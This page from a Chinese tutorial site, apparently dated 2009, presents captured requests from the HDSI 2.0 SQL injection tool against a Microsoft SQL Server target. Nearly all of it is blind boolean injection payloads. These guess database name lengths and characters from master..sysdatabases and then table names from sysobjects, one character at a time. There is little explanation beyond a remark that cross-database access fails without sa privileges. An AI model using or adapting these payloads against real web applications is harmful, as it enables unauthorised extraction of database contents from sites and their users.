当前位置: 首页 > 图文教程 > 服务器 > 安全防护 > hdsi2.0 sql注入部分抓包(3)

安全防护
安全配置向导(SCW)为Win2003打造铜墙铁壁
Windows 2000 Server FSO 安全隐患解决
ASP木马Webshell之安全防范解决办法
使用NetFlow分析网络异常流量(1)
使用NetFlow分析网络异常流量(2)
使用NetFlow分析网络异常流量(3)
使用NetFlow分析网络异常流量(4)
使用NetFlow分析网络异常流量(5)
使用NetFlow分析网络异常流量(6)
使用NetFlow分析网络异常流量(7)
为Win2003打造铜墙铁壁(1)
为Win2003打造铜墙铁壁(2)
如何灵活地运用SQL Injection做数据库渗透
用Asp隐藏文件路径实现防盗链
搜索型注入之我看---注入不分家
简单饶过人体艺术浏览器的VIP验证
蓝雨设计整站SQL注入漏洞
巧改设置强化3389入侵
典型DoS攻击原理及抵御措施(1)
典型DoS攻击原理及抵御措施(2)

安全防护 中的 hdsi2.0 sql注入部分抓包(3)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-29   浏览: 41 ::
收藏到网摘: n/a

跨库:

猜解数据库:

GET

and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <8
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <4
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <6
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <7
...
...
...

and (Select top 1 ascii(substring(name,2,1)) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by
dbid

desc) <104
and (Select top 1 ascii(substring(name,3,1)) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by
dbid

desc) <104
...
...
...


and (Select top 1 len(name) from (Select top 4 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <5


master 不是sa权限,不能跨库


猜解表名:

EventCategory

GET
and (Select top 1 unicode(substring(name,2,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85))
T

order by id desc) < 80

and (Select top 1 unicode(substring(name,11,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char
(85)) T

order by id desc) < 80

and (Select top 1 unicode(substring(name,12,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char
(85)) T

order by id desc) < 80


and (Select top 1 unicode(substring(name,6,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85))
T

order by id desc) < 80